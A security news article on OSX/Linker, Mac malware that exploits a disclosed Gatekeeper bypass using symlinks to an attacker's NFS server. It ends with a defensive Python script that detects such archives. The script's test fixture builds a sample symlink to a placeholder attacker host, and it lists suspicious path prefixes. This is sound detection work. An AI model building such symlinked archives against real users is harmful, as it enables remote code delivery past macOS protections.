OSX/Linker: New zero-day malware targets Mac devices

According to an analysis by researchers at Intego, Mac users have a new piece of malware to contend with. Dubbed “OSX/Linker” by Intego, it attempts to exploit a zero-day bypass of macOS’s Gatekeeper protection. The flaw was found by researcher Filippo Cavallarin and reported to Apple, which said it would fix it within 90 days; when that deadline passed without a patch, he publicly disclosed the details on his blog on May 24.

With this in mind, Intego describes in the following excerpt how OSX/Linker works and the danger it poses to Mac users:

By creating a symbolic link (or “symlink” — similar to an alias) to an app hosted on an attacker-controlled Network File System (NFS) server, and then creating a .zip archive containing that symlink and getting a victim to download it, the app would not be checked by Apple’s rudimentary XProtect bad-download blocker... Although Cavallarin’s vulnerability disclosure specifies a .zip compressed archive, the samples analyzed by Intego were actually disk image files. It seems that malware makers were experimenting to see whether Cavallarin’s vulnerability would work with disk images, too... By the time the disk images had been discovered and analyzed, the NFS server was no longer hosting the Mac app referenced by the disk images’ symlinks... It is possible that these disk images, or subsequent disk images, may have been used in small-scale or targeted attacks, but so far this remains unknown.

As this case shows once again, the idea that Macs do not need to worry about malware is a myth. While there is no evidence yet of a broad-scale attack with OSX/Linker, it is clear that the developers behind it are actively testing how it can leverage the Gatekeeper zero-day. Intego warns that some Mac users may already have been infected and recommends scanning with its VirusBarrier Scanner, which detects OSX/Linker.

Beyond running such a scan, there is no simple way for home users to identify an infection. Intego does note, however, that system administrators can check whether any machines made NFS connections (TCP/UDP port 2049, and the portmapper on port 111) to the IP address “” given in its report, which is a possible indicator of compromise. Connections between May 24 and June 18 should be treated as high priority.
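One check that a user or administrator can run on a downloaded archive before opening it follows from the mechanism in Intego’s excerpt: if the .zip contains a symlink whose target lives outside the archive, and in particular under the macOS NFS automounter path /net/<host>/ that Cavallarin’s bypass relied on, the “app” inside is not what it appears to be. The script below is an added example written for this article, not a tool from Intego or Cavallarin. The host name evil.example.com is a placeholder, the list of flagged path prefixes beyond /net/ is an assumption about what a reviewer would also want to see, and the check covers only zip archives, not the disk images Intego actually observed.

```python
"""Flag symlinks inside a .zip that resolve outside the archive, e.g. to an
NFS automount under /net/ (the path form used in the Gatekeeper bypass).
Added example for this article; not Intego's or Cavallarin's code."""
import io
import stat
import zipfile

# /net/<host>/ is the autofs NFS automounter on macOS. The other prefixes are
# an assumption: network and mounted-volume paths a reviewer would also flag.
SUSPICIOUS_PREFIXES = ("/net/", "/Network/", "/Volumes/")


def _is_symlink(info: zipfile.ZipInfo) -> bool:
    # Unix zip tools store st_mode in the high 16 bits of external_attr.
    return stat.S_ISLNK(info.external_attr >> 16)


def find_suspicious_symlinks(zip_bytes: bytes) -> list:
    """Return (member_name, link_target, reason) for each symlink that escapes
    the archive: a remote/automount prefix, any other absolute path, or a
    relative path that climbs out with '..'."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not _is_symlink(info):
                continue
            # For a symlink entry the member data is the link target itself.
            target = zf.read(info).decode("utf-8", "replace")
            if target.startswith(SUSPICIOUS_PREFIXES):
                findings.append((info.filename, target, "remote/automount path"))
            elif target.startswith("/"):
                findings.append((info.filename, target, "absolute path"))
            elif ".." in target.split("/"):
                findings.append((info.filename, target, "escapes archive"))
    return findings


def build_sample_zip(link_name: str, target: str) -> bytes:
    """Build a constructed archive with one regular file and one symlink,
    stored the way `zip -y` would store it (symlink preserved, not followed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "Double-click the app to continue\n")
        zi = zipfile.ZipInfo(link_name)
        zi.external_attr = (stat.S_IFLNK | 0o755) << 16
        zi.create_system = 3  # 3 = Unix, so readers honour the mode bits
        zf.writestr(zi, target)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample mirroring the disclosed technique: a member named like
    # an app that is really a symlink to an NFS automount of a placeholder host.
    sample = build_sample_zip("Installer.app", "/net/evil.example.com/share/Installer.app")
    for name, target, reason in find_suspicious_symlinks(sample):
        print(f"{name} -> {target}  [{reason}]")
    # Control: a relative symlink that stays inside the archive is not flagged.
    assert find_suspicious_symlinks(build_sample_zip("latest", "v1/app")) == []
```

Run it against a real download with `find_suspicious_symlinks(open("file.zip", "rb").read())`. Any hit under /net/ is worth treating as hostile, since a legitimate app bundle has no reason to be fetched from an NFS server at open time; an archive that contains no symlinks at all still deserves the usual Gatekeeper and XProtect checks, which this script does not replace.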


Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.
